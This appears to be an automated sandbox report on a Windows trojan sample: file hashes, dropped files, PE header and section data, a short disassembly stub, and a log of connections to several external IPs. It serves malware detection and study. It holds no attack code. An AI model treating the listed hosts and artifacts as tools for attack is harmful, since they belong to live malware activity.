SSDEEP: | 192:nBRNF2GYr0bU9+dQVa+xkl8vAEZizuiF0Z24lO8g:BJ2GnbG+dQVa+qehZizuiF0Y4lO8g |
MD5: | 6EE99E056ED1B46885F79D9098F2DA7C |
SHA1: | C71D9F15531F0D503C7F3F1D3001A1E0A6AB87FB |
SHA-256: | 5104B59DBF63AF57CD1473CFC777DA68F1665179FC05259666CEE998088AF6CF |
SHA-512: | 9676DA91FA46276ECB7400CE88E3F39F05E622090AA1DFA1E79F169EE26673EA1723744876074CC6C669D82B4579F82931B48DDDEFDC1739E02915F5EB5A0BB4 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 583644 |
Entropy (8bit): | 3.219558383892526 |
Encrypted: | false |
SSDEEP: | 6144:1ajuKR+bGxIl3rc0A+mD/MLwkqWhz3QTT:cC9bGwYD/MLBq+Q |
MD5: | 6393FA891F7B853C7220F5FB451CEBAE |
SHA1: | D144AB591AB4153EEF21031AA11E11E38CE045C7 |
SHA-256: | E2525FCCE0E827295C5262141F288EAE4E1BDCAF8DD5F373749F71939DCE379B |
SHA-512: | 5BD2D8270F2D4A32022FEA7BED3A75AC4155D6FF8D90D767DAB0A236D6CD6ECBFD9AECF1B1DE68D091EBB64574DEC48ED7BE86F9B3C5149D7BDE3489892BFBD4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6820 |
Entropy (8bit): | 3.7180438023880322 |
Encrypted: | false |
SSDEEP: | 96:RSIU6o7wVetbxqMsRXYZL/8n1vm5aM4U389b44Dr4rVfrIm:R6l7wVeJxqFRXYZj81Gpr389b44cfrIm |
MD5: | 8A6C5D4761801CB13EF373DCAD704BD5 |
SHA1: | 36AE52419DED28A1C07F560D0CABA843B7819A5D |
SHA-256: | F549ACD3831B9D3992C42C0D5A8DCDBA793019C4399AFEB851ECF10C4A79C399 |
SHA-512: | 54EA5B47163DED8983229E97AB985EE31B5E4553BC985D895096A513D180351696463F91B7ACE81F75CE5E317FF74435C0AC11FE0D8887E4457B9C615B4BF116 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4834 |
Entropy (8bit): | 4.46573552928604 |
Encrypted: | false |
SSDEEP: | 48:cvIwWl8zssJg771I91KWpW8VYxYm8M4JM/Ftyq8vyvZew0Md:uIjfqI76r7V9JmWaZeFMd |
MD5: | 80BB6A3A6C07FC1649731C1D4E8CB897 |
SHA1: | 3C2B3BD5B5B81F202CF5083F401E228B95A49327 |
SHA-256: | 28765EC0C90183297CF2DBC86DFB83461E0A448C46D58C3742579A670D5626F1 |
SHA-512: | AFB086081095555B380D6DCAE1D50DF1967AA3C8B5CAC4F06FEBC88B31BECF783C3CDA7336E9BF04C2809A723E581498AF2AA50CD160D06BC7CF655C6D5E4231 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe.log
Download File
Process: | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 654 |
Entropy (8bit): | 5.380476433908377 |
Encrypted: | false |
SSDEEP: | 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT |
MD5: | 30E4BDFC34907D0E4D11152CAEBE27FA |
SHA1: | 825402D6B151041BA01C5117387228EC9B7168BF |
SHA-256: | A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63 |
SHA-512: | 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA |
Malicious: | true |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 80384 |
Entropy (8bit): | 0.7660406673087843 |
Encrypted: | false |
SSDEEP: | 192:BTeTVUkbERHs1pWA4avskoY6g1KbbCcDD:wVUkyHs1pig6g17cX |
MD5: | 75C85B7E8AB404F086BC180768B67081 |
SHA1: | 8D1E90B4C05C0F056AF593736B0305C5D7CF518B |
SHA-256: | 553BC97BCBE4671D4B76082B03B65AD6B9517B3AAF83D850400D64258CE68BBB |
SHA-512: | 1218AB14ED88ADE7DCA8E7C98E41D84240523678FFA8276DFFA96D2A5332711CE35C59A3E3226717A532BF9C34CA23D3782C86962138478A768DE714F1E913FB |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 995840 |
Entropy (8bit): | 5.630174987352983 |
Encrypted: | false |
SSDEEP: | 24576:DIbp4sZotkNjFC/4qxp+k+kPFoHZvPrSMc:cvotkNjg/lhqZvG |
MD5: | 90FD25CED85FE6DB28D21AE7D1F02E2C |
SHA1: | E27EFF4CD4D383F5C564CCE2BD1AAA2FFE4EC056 |
SHA-256: | 97572BD57B08B59744E4DFE6F93FB96BE4002DFE1AA78683771725401776464F |
SHA-512: | 1C775CF8DFDE037EAA98EB14088C70D74923F0F6A83030A71F2F4C1A4453F6154DAB7A4AA175E429860BADDA3E5E0AE226F3C3E8171332F5962BF36F8AA073FA |
Malicious: | true |
Yara Hits: |
|
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 827 |
Entropy (8bit): | 5.298344908566429 |
Encrypted: | false |
SSDEEP: | 24:hMNmMvy4GqptE0ia5WNp8xuY8y+shEr88+M8E4olEC:ImMqopO0Jqd4+sGXt40F |
MD5: | 702C5998DD6D976C132C044F3A1AC842 |
SHA1: | C96E3B78885214A5652C4D44233BACEED1D93AF3 |
SHA-256: | 5F7FFB6600B1AA604090C18B79367DDE254847E01DBE0A8027BA83F8216B51DF |
SHA-512: | 23F3E80C4847CEEF98ABA552B82964A847582D095FED4C8F7069CCE747EC09327D3D7A69403A826972A7C51431947B312A0457201379110F2BFC2008B9D90E2B |
Malicious: | true |
Preview: |
Process: | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 103 |
Entropy (8bit): | 3.9770111444684244 |
Encrypted: | false |
SSDEEP: | 3:XSWHlkHFWKBmGBnLHfYhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0amGBzwLkWFfx/52uyPm |
MD5: | 487AB53955A5EA101720115F32237A45 |
SHA1: | C59D22F8BC8005694505ADDEF88F7968C8D393D3 |
SHA-256: | D64354A111FD859A08552F6738FECD8C5594475E8C03BB37546812A205D0D368 |
SHA-512: | 468689D98645C9F32813D833A07BBCF96FE0DE4593F4F4DC6757501FBCE8E9951D21A8AA4A7050A87A904D203F521134328D426D4E6AB9F20E7E759769003B7C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.465729750120641 |
Encrypted: | false |
SSDEEP: | 6144:xIXfpi67eLPU9skLmb0b4VWSPKaJG8nAgejZMMhA2gX4WABl0uNRdwBCswSby:SXD94VWlLZMM6YFHD+y |
MD5: | 124A5E4456F5085D7D2062C1EE5091EE |
SHA1: | 0297D159BED514EFF13175232124F2F0E215D229 |
SHA-256: | 5422A2D0AB0AC9643F89FB7B792747255C1BDE2F2FDE1C049486A5CD107EF55D |
SHA-512: | C84AFCA39020E7CA17719E1864DAEBA2370FE8DFA659A568AC00E29514DDD0387797103110A2D224F01631393FE9F078B2908941D792AA1995EE338F66788D11 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 571 |
Entropy (8bit): | 4.9398118662542965 |
Encrypted: | false |
SSDEEP: | 12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe |
MD5: | 5294778E41EE83E1F1E78B56466AD690 |
SHA1: | 348B8B4687216D57B8DF59BBCEC481DC9D1E61A6 |
SHA-256: | 3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C |
SHA-512: | 381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1 |
Malicious: | true |
Yara Hits: |
|
Preview: |
File type: | |
Entropy (8bit): | 7.9964618702622134 |
TrID: |
|
File name: | SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
File size: | 1'010'176 bytes |
MD5: | 7afabb528ce69e3a40dec6c3253ef854 |
SHA1: | 5161cc329e2fdda24218898bf637bb47a29daea2 |
SHA256: | 130b8c87664cf95a9fee611a0c14098a4da51f6b768260ad40a7d28ff895aaf0 |
SHA512: | 7eae4d625dfa0313eb3e4c73e5306d0d49d84bc30cfd6d5be41797d315926d7427ac2733206e6263e72c687193ad21737e649cba0fe79bad1798d93c1f18fe5f |
SSDEEP: | 24576:W70v2bR+kpZKDxCUGhJqBAJzJi6adwBih5u5eQp0U:Z2bR+k+VK42z0XwIKp0U |
TLSH: | 29252310028802C3D57A7EB730AE776EC69BD119B9EF0D97F3A917B3063557B8A016D2 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F!.f.................`..........~~... ........@.. ....................................@................................ |
Icon Hash: | 90cececece8e8eb0 |
Entrypoint: | 0x4f7e7e |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x66E72146 [Sun Sep 15 18:02:46 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Instruction |
---|
jmp dword ptr [00402000h] |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
add byte ptr [eax], al |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf7e2c | 0x4f | .text |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf8000 | 0x4ce | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfa000 | 0xc | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x2000 | 0xf5e84 | 0xf6000 | fc12603564eda3f35e416db8fa213c5e | False | 0.9380250015879065 | data | 7.998024903988678 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rsrc | 0xf8000 | 0x4ce | 0x600 | d1bb5ddcae2985391dfb14e9099788c0 | False | 0.3743489583333333 | data | 3.7194301486493373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0xfa000 | 0xc | 0x200 | a8c352392b962b89a6d310ddf9f9e069 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_VERSION | 0xf80a0 | 0x244 | data | 0.4706896551724138 | ||
RT_MANIFEST | 0xf82e4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | 0.5469387755102041 |
DLL | Import |
---|---|
mscoree.dll | _CorExeMain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 16, 2024 12:22:23.294150114 CEST | 49731 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:23.294204950 CEST | 443 | 49731 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:23.294296026 CEST | 49731 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:23.373213053 CEST | 49731 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:23.373231888 CEST | 443 | 49731 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:23.855334997 CEST | 443 | 49731 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:23.855415106 CEST | 49731 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:23.886975050 CEST | 49731 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:23.886991978 CEST | 443 | 49731 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:23.887933969 CEST | 443 | 49731 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:23.936989069 CEST | 49731 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:24.082998991 CEST | 49731 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:24.123406887 CEST | 443 | 49731 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:24.183207035 CEST | 443 | 49731 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:24.183305979 CEST | 443 | 49731 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:24.183374882 CEST | 443 | 49731 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:24.183404922 CEST | 49731 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:24.183418989 CEST | 443 | 49731 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:24.183676004 CEST | 443 | 49731 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:24.183762074 CEST | 49731 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:24.183976889 CEST | 49731 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:24.201263905 CEST | 49731 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:24.357012987 CEST | 49734 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:24.357058048 CEST | 443 | 49734 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:24.357379913 CEST | 49734 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:24.357506990 CEST | 49734 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:24.357515097 CEST | 443 | 49734 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:24.838855982 CEST | 443 | 49734 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:24.864110947 CEST | 49734 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:24.864129066 CEST | 443 | 49734 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:25.023547888 CEST | 443 | 49734 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:25.023881912 CEST | 443 | 49734 | 104.21.93.27 | 192.168.2.4 |
Sep 16, 2024 12:22:25.024269104 CEST | 49734 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:25.024269104 CEST | 49734 | 443 | 192.168.2.4 | 104.21.93.27 |
Sep 16, 2024 12:22:27.101933002 CEST | 49737 | 443 | 192.168.2.4 | 104.20.4.235 |
Sep 16, 2024 12:22:27.101975918 CEST | 443 | 49737 | 104.20.4.235 | 192.168.2.4 |
Sep 16, 2024 12:22:27.102066040 CEST | 49737 | 443 | 192.168.2.4 | 104.20.4.235 |
Sep 16, 2024 12:22:27.121377945 CEST | 49737 | 443 | 192.168.2.4 | 104.20.4.235 |
Sep 16, 2024 12:22:27.121400118 CEST | 443 | 49737 | 104.20.4.235 | 192.168.2.4 |
Sep 16, 2024 12:22:27.594347954 CEST | 443 | 49737 | 104.20.4.235 | 192.168.2.4 |
Sep 16, 2024 12:22:27.594512939 CEST | 49737 | 443 | 192.168.2.4 | 104.20.4.235 |
Sep 16, 2024 12:22:27.597750902 CEST | 49737 | 443 | 192.168.2.4 | 104.20.4.235 |
Sep 16, 2024 12:22:27.597764015 CEST | 443 | 49737 | 104.20.4.235 | 192.168.2.4 |
Sep 16, 2024 12:22:27.598151922 CEST | 443 | 49737 | 104.20.4.235 | 192.168.2.4 |
Sep 16, 2024 12:22:27.599056005 CEST | 49737 | 443 | 192.168.2.4 | 104.20.4.235 |
Sep 16, 2024 12:22:27.639430046 CEST | 443 | 49737 | 104.20.4.235 | 192.168.2.4 |
Sep 16, 2024 12:22:27.735033035 CEST | 443 | 49737 | 104.20.4.235 | 192.168.2.4 |
Sep 16, 2024 12:22:27.735255957 CEST | 443 | 49737 | 104.20.4.235 | 192.168.2.4 |
Sep 16, 2024 12:22:27.735327005 CEST | 49737 | 443 | 192.168.2.4 | 104.20.4.235 |
Sep 16, 2024 12:22:27.735654116 CEST | 49737 | 443 | 192.168.2.4 | 104.20.4.235 |
Sep 16, 2024 12:22:27.984468937 CEST | 49738 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:27.984505892 CEST | 443 | 49738 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:27.984572887 CEST | 49738 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:27.985548019 CEST | 49738 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:27.985563993 CEST | 443 | 49738 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:28.014925957 CEST | 49739 | 443 | 192.168.2.4 | 128.116.119.3 |
Sep 16, 2024 12:22:28.014949083 CEST | 443 | 49739 | 128.116.119.3 | 192.168.2.4 |
Sep 16, 2024 12:22:28.015072107 CEST | 49739 | 443 | 192.168.2.4 | 128.116.119.3 |
Sep 16, 2024 12:22:28.015486002 CEST | 49739 | 443 | 192.168.2.4 | 128.116.119.3 |
Sep 16, 2024 12:22:28.015497923 CEST | 443 | 49739 | 128.116.119.3 | 192.168.2.4 |
Sep 16, 2024 12:22:28.632203102 CEST | 443 | 49738 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:28.632334948 CEST | 49738 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:28.638770103 CEST | 49738 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:28.638781071 CEST | 443 | 49738 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:28.639260054 CEST | 443 | 49738 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:28.686997890 CEST | 49738 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:28.698710918 CEST | 443 | 49739 | 128.116.119.3 | 192.168.2.4 |
Sep 16, 2024 12:22:28.698834896 CEST | 49739 | 443 | 192.168.2.4 | 128.116.119.3 |
Sep 16, 2024 12:22:28.729630947 CEST | 49739 | 443 | 192.168.2.4 | 128.116.119.3 |
Sep 16, 2024 12:22:28.729645967 CEST | 443 | 49739 | 128.116.119.3 | 192.168.2.4 |
Sep 16, 2024 12:22:28.729871988 CEST | 443 | 49739 | 128.116.119.3 | 192.168.2.4 |
Sep 16, 2024 12:22:28.745306969 CEST | 49739 | 443 | 192.168.2.4 | 128.116.119.3 |
Sep 16, 2024 12:22:28.766608000 CEST | 49738 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:28.791404009 CEST | 443 | 49739 | 128.116.119.3 | 192.168.2.4 |
Sep 16, 2024 12:22:28.807431936 CEST | 443 | 49738 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:28.946962118 CEST | 443 | 49738 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:28.947110891 CEST | 443 | 49738 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:28.947169065 CEST | 49738 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:28.952498913 CEST | 49738 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:28.952498913 CEST | 49738 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:28.952517986 CEST | 443 | 49738 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:28.952531099 CEST | 443 | 49738 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:29.113317013 CEST | 443 | 49739 | 128.116.119.3 | 192.168.2.4 |
Sep 16, 2024 12:22:29.113383055 CEST | 443 | 49739 | 128.116.119.3 | 192.168.2.4 |
Sep 16, 2024 12:22:29.113493919 CEST | 49739 | 443 | 192.168.2.4 | 128.116.119.3 |
Sep 16, 2024 12:22:29.115401983 CEST | 49739 | 443 | 192.168.2.4 | 128.116.119.3 |
Sep 16, 2024 12:22:29.464407921 CEST | 49740 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:29.464453936 CEST | 443 | 49740 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:29.464556932 CEST | 49740 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:29.464884996 CEST | 49740 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:29.464905977 CEST | 443 | 49740 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:30.086473942 CEST | 443 | 49740 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:30.092422009 CEST | 49740 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:30.092443943 CEST | 443 | 49740 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:30.094731092 CEST | 49740 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:30.094739914 CEST | 443 | 49740 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:30.342668056 CEST | 443 | 49740 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:30.342742920 CEST | 443 | 49740 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:30.343699932 CEST | 49740 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:30.343699932 CEST | 49740 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:30.343939066 CEST | 49740 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:30.343962908 CEST | 443 | 49740 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:30.843308926 CEST | 49741 | 443 | 192.168.2.4 | 104.20.23.46 |
Sep 16, 2024 12:22:30.843353033 CEST | 443 | 49741 | 104.20.23.46 | 192.168.2.4 |
Sep 16, 2024 12:22:30.843532085 CEST | 49741 | 443 | 192.168.2.4 | 104.20.23.46 |
Sep 16, 2024 12:22:30.843776941 CEST | 49741 | 443 | 192.168.2.4 | 104.20.23.46 |
Sep 16, 2024 12:22:30.843799114 CEST | 443 | 49741 | 104.20.23.46 | 192.168.2.4 |
Sep 16, 2024 12:22:31.330872059 CEST | 443 | 49741 | 104.20.23.46 | 192.168.2.4 |
Sep 16, 2024 12:22:31.330976963 CEST | 49741 | 443 | 192.168.2.4 | 104.20.23.46 |
Sep 16, 2024 12:22:31.332866907 CEST | 49741 | 443 | 192.168.2.4 | 104.20.23.46 |
Sep 16, 2024 12:22:31.332881927 CEST | 443 | 49741 | 104.20.23.46 | 192.168.2.4 |
Sep 16, 2024 12:22:31.333293915 CEST | 443 | 49741 | 104.20.23.46 | 192.168.2.4 |
Sep 16, 2024 12:22:31.334553003 CEST | 49741 | 443 | 192.168.2.4 | 104.20.23.46 |
Sep 16, 2024 12:22:31.379415989 CEST | 443 | 49741 | 104.20.23.46 | 192.168.2.4 |
Sep 16, 2024 12:22:31.704245090 CEST | 443 | 49741 | 104.20.23.46 | 192.168.2.4 |
Sep 16, 2024 12:22:31.704340935 CEST | 443 | 49741 | 104.20.23.46 | 192.168.2.4 |
Sep 16, 2024 12:22:31.704425097 CEST | 49741 | 443 | 192.168.2.4 | 104.20.23.46 |
Sep 16, 2024 12:22:31.763144016 CEST | 49741 | 443 | 192.168.2.4 | 104.20.23.46 |
Sep 16, 2024 12:22:34.821772099 CEST | 49744 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:34.821816921 CEST | 443 | 49744 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:34.821887970 CEST | 49744 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:34.822176933 CEST | 49744 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:34.822191954 CEST | 443 | 49744 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:35.447282076 CEST | 443 | 49744 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:35.499486923 CEST | 49744 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:35.582245111 CEST | 49744 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:35.582284927 CEST | 443 | 49744 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:35.670855999 CEST | 49744 | 443 | 192.168.2.4 | 89.163.145.170 |
